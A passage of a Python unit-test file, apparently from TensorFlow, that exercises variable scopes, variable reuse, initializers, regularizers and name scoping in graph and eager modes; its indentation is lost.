self.assertEqual(0, len(gc.garbage))
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVar(self):
vs = variable_scope._get_default_variable_store()
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testResource(self):
vs = variable_scope._get_default_variable_store()
v1 = vs.get_variable("v", [1], use_resource=True)
self.assertTrue(isinstance(v1, resource_variable_ops.ResourceVariable))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: Tensor.op is meaningless when eager execution is enabled.
def testNameExists(self):
vs = variable_scope._get_default_variable_store()
# No check by default, so we can both create and get existing names.
v = vs.get_variable("v", [1])
v1 = vs.get_variable("v", [1])
self.assertEqual(v, v1)
# When reuse is False, we fail when variables are already there.
vs.get_variable("w", [1], reuse=False) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("v", [1], reuse=False) # That fails.
# When reuse is True, we fail when variables are new.
vs.get_variable("v", [1], reuse=True) # That's ok.
with self.assertRaises(ValueError):
vs.get_variable("u", [1], reuse=True) # That fails.
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testNamelessStore(self):
vs = variable_scope._get_default_variable_store()
vs.get_variable("v1", [2])
vs.get_variable("v2", [2])
expected_names = ["%s:0" % name for name in ["v1", "v2"]]
self.assertEqual(
set(expected_names), set([v.name for v in vs._vars.values()]))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "tower0/foo/v/Assign" ... is not an element of
# this graph.
@test_util.run_in_graph_and_eager_modes
def testVarScopeInitializer(self):
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("tower0") as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
with variable_scope.variable_scope(tower, initializer=init):
w = variable_scope.get_variable("w", [])
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.3)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeConstraint(self):
constraint = lambda x: 0. * x
with variable_scope.variable_scope("tower1") as tower:
with variable_scope.variable_scope("foo", constraint=constraint):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.constraint, constraint)
with variable_scope.variable_scope(tower, constraint=constraint):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.constraint, constraint)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'string:0' shape=() dtype=string>
# has invalid type <class '...ResourceVariable'>, must be a string or Tensor.
# (Can not convert a ResourceVariable into a Tensor or Operation.)
def testStringDefaultInitializer(self):
with self.cached_session():
v = variable_scope.get_variable("string", shape=[], dtype=dtypes.string)
variables_lib.global_variables_initializer().run()
self.assertAllEqual(compat.as_bytes(self.evaluate(v)), b"")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeDType(self):
with variable_scope.variable_scope("tower2") as tower:
with variable_scope.variable_scope("foo", dtype=dtypes.float16):
v = variable_scope.get_variable("v", [])
self.assertEqual(v.dtype.base_dtype, dtypes.float16)
with variable_scope.variable_scope(tower, dtype=dtypes.float16):
w = variable_scope.get_variable("w", [])
self.assertEqual(w.dtype.base_dtype, dtypes.float16)
def testGetVariableInGraphNestedUnderEagerContext(self):
with context.eager_mode():
@function.defun
def f():
v = variable_scope.get_variable("should_be_resource", [])
self.assertEqual(type(v), resource_variable_ops.ResourceVariable)
f()
def testEagerVariableStore(self):
with context.eager_mode():
store = variable_scope.EagerVariableStore()
with store.as_default():
v = variable_scope.get_variable("v", shape=(), trainable=True)
w = variable_scope.get_variable("w", shape=(), trainable=False)
self.assertTrue(v in store.variables())
self.assertTrue(w in store.variables())
self.assertTrue(v in store.trainable_variables())
self.assertFalse(w in store.trainable_variables())
self.assertFalse(v in store.non_trainable_variables())
self.assertTrue(w in store.non_trainable_variables())
# Test copying.
new_store = store.copy()
with new_store.as_default():
new_v = variable_scope.get_variable("v")
new_w = variable_scope.get_variable("w")
self.assertEqual(new_v.numpy(), v.numpy())
self.assertEqual(new_w.numpy(), w.numpy())
self.assertTrue(new_v in new_store.variables())
self.assertTrue(new_w in new_store.variables())
self.assertTrue(new_v in new_store.trainable_variables())
self.assertFalse(new_w in new_store.trainable_variables())
self.assertFalse(new_v in new_store.non_trainable_variables())
self.assertTrue(new_w in new_store.non_trainable_variables())
# Check that variables are separate instances.
for v in store.variables():
v.assign(-1)
for v in new_store.variables():
v.assign(1)
for v in store.variables():
self.assertEqual(v.numpy(), -1)
for v in new_store.variables():
self.assertEqual(v.numpy(), 1)
def testEagerVariableStoreWithEagerDefun(self):
with context.eager_mode():
@function.defun
def f():
x = constant_op.constant([[2.0]])
d1 = core_layers.Dense(
1, name="my_dense", kernel_initializer=init_ops.ones_initializer())
_ = d1(x) # create variables
self.assertEqual(len(d1.variables), 2)
v1, v2 = d1.variables
d2 = core_layers.Dense(
1,
name="my_dense",
kernel_initializer=init_ops.ones_initializer(),
_reuse=True)
_ = d2(x)
self.assertEqual(len(d2.variables), 2)
v3, v4 = d2.variables
self.assertAllEqual([v1, v2], [v3, v4])
f()
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
@test_util.run_in_graph_and_eager_modes
def testEagerVariablesStoreAddsToCollections(self):
store = variable_scope.EagerVariableStore()
with store.as_default():
trainable = variable_scope.get_variable("v1", [], trainable=True)
not_trainable = variable_scope.get_variable("v2", [], trainable=False)
concat = variable_scope.get_variable(
"v3", [], collections=[ops.GraphKeys.CONCATENATED_VARIABLES])
self.assertEqual(
ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES),
[trainable, not_trainable])
self.assertEqual(
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES),
[trainable, concat])
self.assertEqual(
ops.get_collection(ops.GraphKeys.CONCATENATED_VARIABLES), [concat])
def testEagerVariablesOutsideStoreNotAddedToCollections(self):
with context.eager_mode():
variable_scope.get_variable("v1", [], trainable=True)
variable_scope.get_variable("v2", [], trainable=False)
self.assertFalse(ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES))
self.assertFalse(ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "v4/Assign" ... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testInitFromNonTensorValue(self):
v = variable_scope.get_variable("v4", initializer=4, dtype=dtypes.int32)
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 4)
w = variable_scope.get_variable(
"w4", initializer=numpy.array([1, 2, 3]), dtype=dtypes.int64)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), [1, 2, 3])
# A quirk to be revisited?
error = ValueError if context.executing_eagerly() else TypeError
with self.assertRaises(error):
variable_scope.get_variable("x4", initializer={})
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: "xx0/Assign" ...is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testInitFromNonInitializer(self):
# Test various dtypes with zeros initializer as following:
types = [
dtypes.int8, dtypes.uint8, dtypes.int16, dtypes.uint16, dtypes.int32,
dtypes.int64, dtypes.bool
]
# Use different variable_name to distinguish various dtypes
for (i, dtype) in enumerate(types):
x = variable_scope.get_variable(
name="xx%d" % i, shape=(3, 4), dtype=dtype)
y = variable_scope.get_variable(
name="yy%d" % i,
shape=(3, 4),
dtype=dtype,
initializer=init_ops.zeros_initializer(dtype=dtype))
self.evaluate(variables_lib.global_variables_initializer())
self.assertAllEqual(self.evaluate(x.value()), self.evaluate(y.value()))
# TODO(alive): support variable partitioning/caching in eager mode.
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# InvalidArgumentError: /job:moo/replica:0/task:0/device:CPU:0 unknown device.
def testVarScopeCachingDevice(self):
with self.cached_session():
caching_device = "/job:moo"
with variable_scope.variable_scope("tower"):
with variable_scope.variable_scope(
"caching", caching_device=caching_device):
v = variable_scope.get_variable("v", [])
self.assertTrue(v.value().device.startswith(caching_device))
with variable_scope.variable_scope("child"):
v2 = variable_scope.get_variable("v", [])
self.assertTrue(v2.value().device.startswith(caching_device))
with variable_scope.variable_scope("not_cached", caching_device=""):
v2_not_cached = variable_scope.get_variable("v", [])
self.assertFalse(
v2_not_cached.value().device.startswith(caching_device))
with variable_scope.variable_scope(
"not_cached_identity_device",
caching_device=lambda op: op.device):
v2_identity_device = variable_scope.get_variable("v", [])
self.assertFalse(
v2_identity_device.value().device.startswith(caching_device))
with variable_scope.variable_scope("we_will_do_it_live") as vs_live:
vs_live.set_caching_device("/job:live")
v_live = variable_scope.get_variable("v", [])
self.assertTrue(v_live.value().device.startswith("/job:live"))
v_tower = variable_scope.get_variable("v", [])
self.assertFalse(v_tower.value().device.startswith(caching_device))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: ".../Assign"... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testVarScopeRegularizer(self):
init = init_ops.constant_initializer(0.3)
def regularizer1(v):
return math_ops.reduce_mean(v) + 0.1
def regularizer2(v):
return math_ops.reduce_mean(v) + 0.2
with variable_scope.variable_scope(
"tower3", regularizer=regularizer1) as tower:
with variable_scope.variable_scope("foo", initializer=init):
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(1, len(losses))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
with variable_scope.variable_scope(tower, initializer=init) as vs:
u = variable_scope.get_variable("u", [])
vs.set_regularizer(regularizer2)
w = variable_scope.get_variable("w", [])
# Next 3 variable not regularized to test disabling regularization.
x = variable_scope.get_variable(
"x", [], regularizer=variable_scope.no_regularizer)
with variable_scope.variable_scope(
"baz", regularizer=variable_scope.no_regularizer):
y = variable_scope.get_variable("y", [])
vs.set_regularizer(variable_scope.no_regularizer)
z = variable_scope.get_variable("z", [])
# Check results.
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses))
self.evaluate(variables_lib.variables_initializer([u, w, x, y, z]))
self.assertAllClose(self.evaluate(losses[0]), 0.4)
self.assertAllClose(self.evaluate(losses[1]), 0.4)
self.assertAllClose(self.evaluate(losses[2]), 0.5)
with variable_scope.variable_scope("foo", reuse=True):
# reuse=True is for now only supported when eager execution is disabled.
if not context.executing_eagerly():
v = variable_scope.get_variable("v",
[]) # "v" is already there, reused
losses = ops.get_collection(ops.GraphKeys.REGULARIZATION_LOSSES)
self.assertEqual(3, len(losses)) # No new loss added.
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Tensor-typed variable initializers must either be wrapped in an
# init_scope or callable...
@test_util.run_in_graph_and_eager_modes
def testInitializeFromValue(self):
init = constant_op.constant(0.1)
w = variable_scope.get_variable("v", initializer=init)
self.evaluate(variables_lib.variables_initializer([w]))
self.assertAllClose(self.evaluate(w.value()), 0.1)
with self.assertRaisesRegexp(ValueError, "shape"):
# We disallow explicit shape specification when initializer is constant.
variable_scope.get_variable("u", [1], initializer=init)
with variable_scope.variable_scope("foo", initializer=init):
# Constant initializer can be passed through scopes if needed.
v = variable_scope.get_variable("v")
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.1)
# Check that non-float32 initializer creates a non-float32 variable.
init = constant_op.constant(1, dtype=dtypes.int32)
t = variable_scope.get_variable("t", initializer=init)
self.assertEqual(t.dtype.base_dtype, dtypes.int32)
# Raise error if `initializer` dtype and `dtype` are not identical.
with self.assertRaisesRegexp(ValueError, "don't match"):
variable_scope.get_variable("s", initializer=init, dtype=dtypes.float64)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument <tf.Variable 'v0:0' shape=(1,) dtype=float32> has
# invalid type <class '...ops.resource_variable_ops.ResourceVariable'>, must
# be a string or Tensor. (Can not convert a ResourceVariable into a Tensor or
# Operation.)
def testControlDeps(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [1], initializer=init_ops.constant_initializer(0))
with ops.control_dependencies([v0.value()]):
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
add = v1 + v0
# v0 should be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
# We should be able to initialize and run v1 without initializing
# v0, even if the variable was created with a control dep on v0.
sess.run(v1.initializer)
self.assertEqual(1, sess.run(v1))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(add)
# If we initialize v0 we should be able to run 'add'.
sess.run(v0.initializer)
sess.run(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AssertionError: True is not false (last assertFalse)
def testEnableResourceVariables(self):
old = variable_scope._DEFAULT_USE_RESOURCE
try:
variable_scope.enable_resource_variables()
self.assertTrue(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
variable_scope.disable_resource_variables()
self.assertFalse(isinstance(variables_lib.VariableV1(1.0),
resource_variable_ops.ResourceVariable))
finally:
variable_scope._DEFAULT_USE_RESOURCE = old
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# TypeError: Fetch argument None has invalid type <type 'NoneType'>
def testControlFlow(self):
with self.cached_session() as sess:
v0 = variable_scope.get_variable(
"v0", [], initializer=init_ops.constant_initializer(0))
var_dict = {}
# Call get_variable in each of the cond clauses.
def var_in_then_clause():
v1 = variable_scope.get_variable(
"v1", [1], initializer=init_ops.constant_initializer(1))
var_dict["v1"] = v1
return v1 + v0
def var_in_else_clause():
v2 = variable_scope.get_variable(
"v2", [1], initializer=init_ops.constant_initializer(2))
var_dict["v2"] = v2
return v2 + v0
add = control_flow_ops.cond(
math_ops.less(v0, 10), var_in_then_clause, var_in_else_clause)
v1 = var_dict["v1"]
v2 = var_dict["v2"]
# We should be able to initialize and run v1 and v2 without initializing
# v0, even if the variable was created with a control dep on v0.
sess.run(v1.initializer)
self.assertEqual([1], sess.run(v1))
sess.run(v2.initializer)
self.assertEqual([2], sess.run(v2))
# v0 should still be uninitialized.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(v0)
# We should not be able to run 'add' yet.
with self.assertRaisesRegexp(errors.OpError, "uninitialized"):
sess.run(add)
# If we initialize v0 we should be able to run 'add'.
sess.run(v0.initializer)
sess.run(add)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# ValueError: Operation name: ".../Assign"... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testGetVariableScope(self):
# Test the get_variable_scope() function and setting properties of result.
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("bar"):
new_init1 = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init1, None)
# Check that we can set initializer like this.
variable_scope.get_variable_scope().set_initializer(init)
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
if not context.executing_eagerly():
# Check that we can set reuse.
variable_scope.get_variable_scope().reuse_variables()
with self.assertRaises(ValueError): # Fail, w does not exist yet.
variable_scope.get_variable("w", [1])
# Check that the set initializer goes away.
new_init = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init, None)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScope(self):
with variable_scope.variable_scope("tower4") as tower:
self.assertEqual(tower.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower4/scope/")
with variable_scope.variable_scope("tower5"):
with variable_scope.variable_scope("bar") as bar:
self.assertEqual(bar.name, "tower5/bar")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower5/bar/scope/")
with variable_scope.variable_scope("tower6"):
with variable_scope.variable_scope(tower, reuse=True) as tower_shared:
self.assertEqual(tower_shared.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower6/tower4/scope/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNameScope(self):
with ops.name_scope("testVarScopeNameScope1"):
with variable_scope.variable_scope("tower") as tower:
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(
tower): # Re-entering acts like another "tower".
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_1/scope2/")
with variable_scope.variable_scope(
"tower"): # Re-entering by string acts the same.
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_2/scope2/")
with ops.name_scope("testVarScopeNameScope2"):
with variable_scope.variable_scope("tower"):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(tower):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower_1/scope2/")
root_var_scope = variable_scope.get_variable_scope()
with ops.name_scope("testVarScopeNameScope3"):
with variable_scope.variable_scope(root_var_scope):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope3/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOriginalNameScope(self):
with self.cached_session():
with ops.name_scope("scope1"):
with variable_scope.variable_scope("tower") as tower:
self.assertEqual(tower.original_name_scope, "scope1/tower/")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "scope1/tower/scope2/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower) as tower1:
# Re-entering preserves original name scope.
self.assertEqual(tower1.original_name_scope, "scope1/tower/")
with ops.name_scope("foo") as sc2:
self.assertEqual(sc2, "scope2/tower/foo/")
# Test re-entering original name scope.
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower):
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar_1/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeObjectReuse(self):
with self.cached_session():
vs = None
with variable_scope.variable_scope("jump", reuse=True) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertTrue(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertTrue(jump_no_reuse.reuse) # Inherited, cannot be undone.
with variable_scope.variable_scope("jump", reuse=False) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertFalse(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertFalse(jump_no_reuse.reuse)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = constant_op.constant(value)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = state_ops.assign(variable_scope.get_variable("var", []), x)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = variable_scope.get_variable("var", [])
self.assertEqual(value, x.eval())
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: Tensor.op is meaningless when eager execution is enabled.
def testVarOpScope(self):
with self.cached_session():
with ops.name_scope("testVarOpScope1"):
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "tower/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower/testVarOpScope2/")
with variable_scope.variable_scope("tower", "default", []):
with self.assertRaises(ValueError):
variable_scope.get_variable("w", [])
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower_1/testVarOpScope2/")
with ops.name_scope("testVarOpScope2"):
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default/testVarOpScope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default_1/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default_1/testVarOpScope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with variable_scope.variable_scope("default") as default:
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/layer/w:0")
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_1/w:0")
with variable_scope.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True) as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: Tensor.op is meaningless when eager execution is enabled.
def testVarScopeGetVar(self):
with self.cached_session():
with variable_scope.variable_scope("root"):
with variable_scope.variable_scope("towerA") as tower_a:
va = variable_scope.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("towerB"):
vb = variable_scope.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with self.assertRaises(ValueError):
with variable_scope.variable_scope("towerA"):
va2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("towerA", reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("foo"):
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va3 = variable_scope.get_variable("v", [1])
self.assertEqual(va, va3)
with self.assertRaises(ValueError):
with variable_scope.variable_scope(tower_a, reuse=True):
with variable_scope.variable_scope("baz"):
variable_scope.get_variable("v", [1])
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [1], dtype=dtypes.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer_1/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default_1/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer) as outer:
with variable_scope.variable_scope("tower", "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: 'variable_scope' object has no attribute
# '_graph_context_manager'
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with variable_scope.variable_scope(None, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
